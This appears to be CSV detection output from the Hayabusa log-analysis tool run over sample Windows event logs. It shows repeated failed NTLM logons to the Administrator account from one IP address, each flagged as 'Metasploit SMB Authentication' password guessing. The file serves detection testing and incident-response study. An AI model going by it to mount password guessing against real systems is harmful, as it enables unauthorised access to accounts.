SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwFKFySH4w2yWtPX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlwGTGadOEMfUFiM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hZ9WuMoOtxGdwOQn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: cCLK0gWvRoz0Ceao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDrcOxtm2fHXK5pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm2tPGetcAJkSuvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FBskiUSfF2ghuDcF : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZJal2nq3JAk6I2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9ek0Sl1ikhIfIb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eHrn5Tp9JtnAgCbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7tR8gp2piqqixqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SqSBRMoiFeWe4FAt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nu4m1xKDU0OUkoR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: gui98cdQHPgyNOZI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bm4U7TAfsPTEiygC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fDOoaVWVFAMLiA71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qiJeLgInEkHffefo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWyguWQP2iYUArhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vDa3GqsTMMXguFhi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lr0lkAcdnji1zjW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4WfNFd5MkQxaxHGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8hdPhtxP4Ds65yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2BBoWoXWXuRysTx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6GEhZ2BduHwjJj9H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GbwEHQCAUJd64LlA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wGfoObbN8ioefyce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iLHhCgHvmOzoLLqG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9KL69y47DMyFOWT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ECuVYiqdMw2dMjT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YJCYumRekD7AREYQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0H4OxKzoemZrsosT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSHnvxa0khWdWBVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bJkPp0bghDCPYz52 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SfHRWGXjCej9HSPb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X42H7EvrvzsRqXWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moo42NdOq30Gnz3T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4NHVYxxDkCOsQw8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iPUiW0vFQB405kwS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OtcZ4ymkeLHeU7YJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxZCDKWtqkGJ0dnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f4GGnhttZgmRPRJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gI0j9w45eXEFeex3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BVZ2YRDUAOsNgKxo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: VJfIpxlcwVf7pWga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Oerixd9ODF6fslsC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJC5yvrIymYgaHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4schZcUP8Im8Ee1e : IP Address: 192.168.198.149 : AuthPackage: 
